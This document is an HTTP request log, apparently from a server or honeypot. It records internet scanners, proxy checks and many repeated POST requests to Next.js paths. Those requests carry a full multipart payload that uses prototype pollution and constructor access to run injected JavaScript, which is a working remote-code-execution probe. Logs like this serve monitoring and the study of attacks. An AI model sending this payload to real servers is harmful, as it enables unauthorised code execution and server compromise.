{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 195401+true+233454;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx45617145055
X-Nextjs-Html-Request-Id: ilovepoop_45617145055
X-Nextjs-Request-Id: poop1234
Content-Length: 513
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx45617145055
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.26:52088
Path: /_next/server
URL: /_next/server
Method: POST
[2026-04-06 16:35:38] === HTTP Request ===
===================
------WebKitFormBoundaryx1259738050761--
------WebKitFormBoundaryx1259738050761
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1259738050761
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 156485+true+8050216;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1259738050761
X-Nextjs-Request-Id: poop1234
User-Agent: Mozilla/5.0 (Linux; Android 9; AFTWMST22 Build/PS7233; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.152 Mobile Safari/537.36
Connection: close
X-Nextjs-Html-Request-Id: ilovepoop_1259738050761
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1259738050761
Next-Action: x
Accept-Encoding: gzip, deflate
Content-Length: 522
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.26:52072
Path: /api
URL: /api
Method: POST
[2026-04-06 16:35:37] === HTTP Request ===
===================
------WebKitFormBoundaryx99342360251--
------WebKitFormBoundaryx99342360251
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx99342360251
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 31025+true+3202010;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx99342360251
X-Nextjs-Html-Request-Id: ilovepoop_99342360251
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx99342360251
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/134.0.6998.99 Mobile/15E148 Safari/604.1
Connection: close
Content-Length: 513
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.26:52064
Path: /_next
URL: /_next
Method: POST
[2026-04-06 16:35:37] === HTTP Request ===
[2026-04-06 16:35:36] Main page accessed - IP: 45.205.1.26:52048
===================
------WebKitFormBoundaryx818830674001--
------WebKitFormBoundaryx818830674001
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx818830674001
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 282600+true+2897490;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx818830674001
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
X-Nextjs-Html-Request-Id: ilovepoop_818830674001
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx818830674001
X-Nextjs-Request-Id: poop1234
Next-Action: x
Content-Length: 518
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.26:52048
Path: /
URL: /
Method: POST
[2026-04-06 16:35:36] === HTTP Request ===
===================
Via: 1.1 Caddy
Accept-Encoding: gzip, deflate, br
Accept: text/plain,text/html,*/*
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 66.249.68.133
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:56634
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-04-06 14:27:44] === HTTP Request ===
===================
Accept-Language: en US,en;q=0.9,sv;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate, gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 5.61.209.107:57932
Path: /SDK/webLanguage
URL: /SDK/webLanguage
Method: GET
[2026-04-06 14:23:53] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:38900
Path: /jars
URL: /jars
Method: GET
[2026-04-06 13:49:34] === HTTP Request ===
[2026-04-06 13:19:02] Main page accessed - IP: 172.236.228.218:9336
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 172.236.228.218:9336
Path: /
URL: /
Method: GET
[2026-04-06 13:19:02] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
Accept: */*
Accept-Language: en-CA,en-US;q=0.7,en;q=0.3
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 146.190.69.241:52218
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-04-06 11:27:21] === HTTP Request ===
===================
Accept-Language: en-CA,en-US;q=0.7,en;q=0.3
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 146.190.69.241:52204
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-04-06 11:27:21] === HTTP Request ===
[2026-04-06 11:27:20] Main page accessed - IP: 146.190.69.241:52198
===================
Accept-Language: en-CA,en-US;q=0.7,en;q=0.3
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 146.190.69.241:52198
Path: /
URL: /
Method: GET
[2026-04-06 11:27:20] === HTTP Request ===
[2026-04-06 11:24:57] Main page accessed - IP: 159.223.179.74:46138
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Android 4.4; Mobile; rv:41.0) Gecko/41.0 Firefox/41.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 159.223.179.74:46138
Path: /
URL: /
Method: GET
[2026-04-06 11:24:57] === HTTP Request ===
[2026-04-06 11:13:08] Main page accessed - IP: 176.65.149.45:51052
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:51052
Path: /
URL: /
Method: GET
[2026-04-06 11:13:08] === HTTP Request ===
[2026-04-06 10:33:40] Main page accessed - IP: 207.90.244.21:45272
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 207.90.244.21:45272
Path: /
URL: /
Method: GET
[2026-04-06 10:33:40] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: proxy.flarevpn.digital:8080
RemoteAddr: 45.135.194.113:37606
Path: /judge
URL: http://proxy.flarevpn.digital:8080/judge
Method: GET
[2026-04-06 08:39:08] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: proxy.flarevpn.digital:8080
RemoteAddr: 45.135.194.113:37592
Path: /judge
URL: http://proxy.flarevpn.digital:8080/judge
Method: GET
[2026-04-06 08:39:08] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: proxy.flarevpn.digital:8080
RemoteAddr: 45.135.194.113:37590
Path: /judge
URL: http://proxy.flarevpn.digital:8080/judge
Method: GET
[2026-04-06 08:39:08] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 118.193.43.158:49402
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-04-06 07:52:18] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 118.193.43.158:49404
Path: /sitemap.xml
URL: /sitemap.xml
Method: GET
[2026-04-06 07:52:18] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 118.193.43.158:49296
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-04-06 07:52:17] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 118.193.43.158:49136
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-04-06 07:52:17] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 118.193.43.158:49026
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-04-06 07:52:16] === HTTP Request ===
[2026-04-06 07:52:16] Main page accessed - IP: 118.193.43.158:48852
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 9_2_2) AppleWebKit/545.55 (KHTML, like Gecko) Chrome/63.0.2641 Safari/537.36
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 118.193.43.158:48852
Path: /
URL: /
Method: GET
[2026-04-06 07:52:16] === HTTP Request ===
[2026-04-06 07:50:56] Main page accessed - IP: 152.32.141.40:14982
===================
Accept: */*
User-Agent: curl/7.29.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 152.32.141.40:14982
Path: /
URL: /
Method: GET
[2026-04-06 07:50:56] === HTTP Request ===
[2026-04-06 07:34:32] Main page accessed - IP: 121.41.167.204:56492
===================
Accept-Language: zh-CN,zh;q=0.8
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 121.41.167.204:56492
Path: /
URL: /
Method: GET
[2026-04-06 07:34:32] === HTTP Request ===
===================
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:40676
Path: /jars
URL: /jars
Method: GET
[2026-04-06 06:10:46] === HTTP Request ===
[2026-04-06 05:36:59] Main page accessed - IP: 45.79.207.71:60493
===================
User-Agent: Mozilla/5.0 zgrab/0.x
Accept-Encoding: gzip
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 45.79.207.71:60493
Path: /
URL: /
Method: GET
[2026-04-06 05:36:59] === HTTP Request ===
[2026-04-06 05:22:09] Main page accessed - IP: 176.65.149.45:50506
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:50506
Path: /
URL: /
Method: GET
[2026-04-06 05:22:09] === HTTP Request ===
===================
User-Agent: Python/3.9 python-socks/2.0.3
Headers:
Protocol: HTTP/1.1
Host: 185.65.245.140:7227
RemoteAddr: 176.65.134.3:48118
Path:
URL: //185.65.245.140:7227
Method: CONNECT
[2026-04-06 04:37:37] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
X-Requested-With: XMLHttpRequest
Accept: */*
Accept-Encoding: gzip, deflate, gzip, deflate
Accept-Language: en US,en;q=0.9,sv;q=0.8
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 5.61.209.107:62798
Path: /SDK/webLanguage
URL: /SDK/webLanguage
Method: GET
[2026-04-06 03:58:27] === HTTP Request ===
[2026-04-06 02:27:57] Main page accessed - IP: 147.185.132.150:62480
===================
Accept-Encoding: gzip
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 147.185.132.150:62480
Path: /
URL: /
Method: GET
[2026-04-06 02:27:57] === HTTP Request ===
===================
------WebKitFormBoundaryx797043791286--
------WebKitFormBoundaryx797043791286
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx797043791286
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 175595+true+4539103;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx797043791286
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx797043791286
Next-Action: x
Accept-Encoding: gzip, deflate
X-Nextjs-Html-Request-Id: ilovepoop_797043791286
X-Nextjs-Request-Id: poop1234
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Content-Length: 518
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.32.162.28:39554
Path: /api/route
URL: /api/route
Method: POST
[2026-04-06 01:19:53] === HTTP Request ===
===================
------WebKitFormBoundaryx1170157232725--
------WebKitFormBoundaryx1170157232725
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1170157232725
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 343793+true+3403668;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1170157232725
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1170157232725
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 522
X-Nextjs-Html-Request-Id: ilovepoop_1170157232725
X-Nextjs-Request-Id: poop1234
Next-Action: x
User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.135 Mobile Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.32.162.28:39548
Path: /app
URL: /app
Method: POST
[2026-04-06 01:19:52] === HTTP Request ===
===================
------WebKitFormBoundaryx167224517686--
------WebKitFormBoundaryx167224517686
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx167224517686
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 152991+true+1093035;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx167224517686
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.135 Mobile Safari/537.36
Connection: close
Content-Length: 518
X-Nextjs-Html-Request-Id: ilovepoop_167224517686
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx167224517686
Next-Action: x
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.32.162.28:39532
Path: /_next/server
URL: /_next/server
Method: POST
[2026-04-06 01:19:52] === HTTP Request ===
===================
------WebKitFormBoundaryx127813863871--
------WebKitFormBoundaryx127813863871
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx127813863871
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 35778+true+3572415;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx127813863871
X-Nextjs-Html-Request-Id: ilovepoop_127813863871
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx127813863871
Next-Action: x
Connection: close
Content-Length: 517
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 14; SM-F9560 Build/UP1A.231005.007; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/127.0.6533.103 Mobile Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.32.162.28:39528
Path: /api
URL: /api
Method: POST
[2026-04-06 01:19:52] === HTTP Request ===
===================
------WebKitFormBoundaryx36913586401--
------WebKitFormBoundaryx36913586401
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx36913586401
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 120544+true+306225;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx36913586401
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx36913586401
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Content-Length: 513
X-Nextjs-Html-Request-Id: ilovepoop_36913586401
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.32.162.28:39498
Path: /_next
URL: /_next
Method: POST
[2026-04-06 01:19:52] === HTTP Request ===
[2026-04-06 01:19:51] Main page accessed - IP: 193.32.162.28:39474
===================
------WebKitFormBoundaryx560789394463--
------WebKitFormBoundaryx560789394463
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx560789394463
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 76509+true+7329718;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx560789394463
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx560789394463
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; he-il; NEO-X5-116A Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Connection: close
X-Nextjs-Html-Request-Id: ilovepoop_560789394463
X-Nextjs-Request-Id: poop1234
Next-Action: x
Content-Length: 517
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.32.162.28:39474
Path: /
URL: /
Method: POST
[2026-04-06 01:19:51] === HTTP Request ===
[2026-04-05 23:24:21] Main page accessed - IP: 172.30.0.12:49674
===================
X-Forwarded-Proto: https
Via: 1.1 Caddy
User-Agent: Scrapy/2.13.4 (+https://scrapy.org)
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 34.90.66.217
Accept-Language: en
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:49674
Path: /
URL: /
Method: GET
[2026-04-05 23:24:21] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: proxy.flarevpn.digital:8080
RemoteAddr: 93.123.109.183:42864
Path: /judge
URL: http://proxy.flarevpn.digital:8080/judge
Method: GET
[2026-04-05 23:18:21] === HTTP Request ===
===================
User-Agent: Go-http-client/1.1
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: proxy.flarevpn.digital:8080
RemoteAddr: 93.123.109.183:42856
Path: /judge
URL: http://proxy.flarevpn.digital:8080/judge
Method: GET
[2026-04-05 23:18:21] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: proxy.flarevpn.digital:8080
RemoteAddr: 93.123.109.183:42850
Path: /judge
URL: http://proxy.flarevpn.digital:8080/judge
Method: GET
[2026-04-05 23:18:20] === HTTP Request ===
[2026-04-05 21:26:13] Main page accessed - IP: 185.247.137.190:57403
===================
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 185.247.137.190:57403
Path: /
URL: /
Method: GET
[2026-04-05 21:26:13] === HTTP Request ===
===================
------WebKitFormBoundaryx390682035101--
------WebKitFormBoundaryx390682035101
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx390682035101
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 228700+true+1708273;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx390682035101
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
X-Nextjs-Html-Request-Id: ilovepoop_390682035101
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
Content-Length: 518
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx390682035101
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.26:50996
Path: /api/route
URL: /api/route
Method: POST
[2026-04-05 21:04:05] === HTTP Request ===
===================
------WebKitFormBoundaryx2247321561747--
------WebKitFormBoundaryx2247321561747
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx2247321561747
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 325867+true+6896438;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx2247321561747
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx2247321561747
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; he-il; NEO-X5-116A Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Content-Length: 522
X-Nextjs-Html-Request-Id: ilovepoop_2247321561747
Next-Action: x
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.26:50984
Path: /app
URL: /app
Method: POST
[2026-04-05 21:04:05] === HTTP Request ===
===================
------WebKitFormBoundaryx941312642645--
------WebKitFormBoundaryx941312642645
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx941312642645
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 227711+true+4133804;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx941312642645
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx941312642645
X-Nextjs-Request-Id: poop1234
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Content-Length: 518
X-Nextjs-Html-Request-Id: ilovepoop_941312642645
Next-Action: x
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.26:50972
Path: /_next/server
URL: /_next/server
Method: POST
[2026-04-05 21:04:04] === HTTP Request ===
===================
------WebKitFormBoundaryx2142507017443--
------WebKitFormBoundaryx2142507017443
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx2142507017443
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 321049+true+6673458;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx2142507017443
User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.135 Mobile Safari/537.36
Content-Length: 522
X-Nextjs-Html-Request-Id: ilovepoop_2142507017443
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx2142507017443
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.26:50966
Path: /api
URL: /api
Method: POST
[2026-04-05 21:04:04] === HTTP Request ===
===================
------WebKitFormBoundaryx899215940217--
------WebKitFormBoundaryx899215940217
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx899215940217
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 153256+true+5867411;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx899215940217
Connection: close
Content-Length: 518
X-Nextjs-Html-Request-Id: ilovepoop_899215940217
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx899215940217
X-Nextjs-Request-Id: poop1234
Next-Action: x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.26:35402
Path: /_next
URL: /_next
Method: POST
[2026-04-05 21:04:03] === HTTP Request ===
[2026-04-05 21:04:03] Main page accessed - IP: 45.205.1.26:35390
===================
------WebKitFormBoundaryx1533146103857--
------WebKitFormBoundaryx1533146103857
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1533146103857
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 189656+true+8083826;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1533146103857
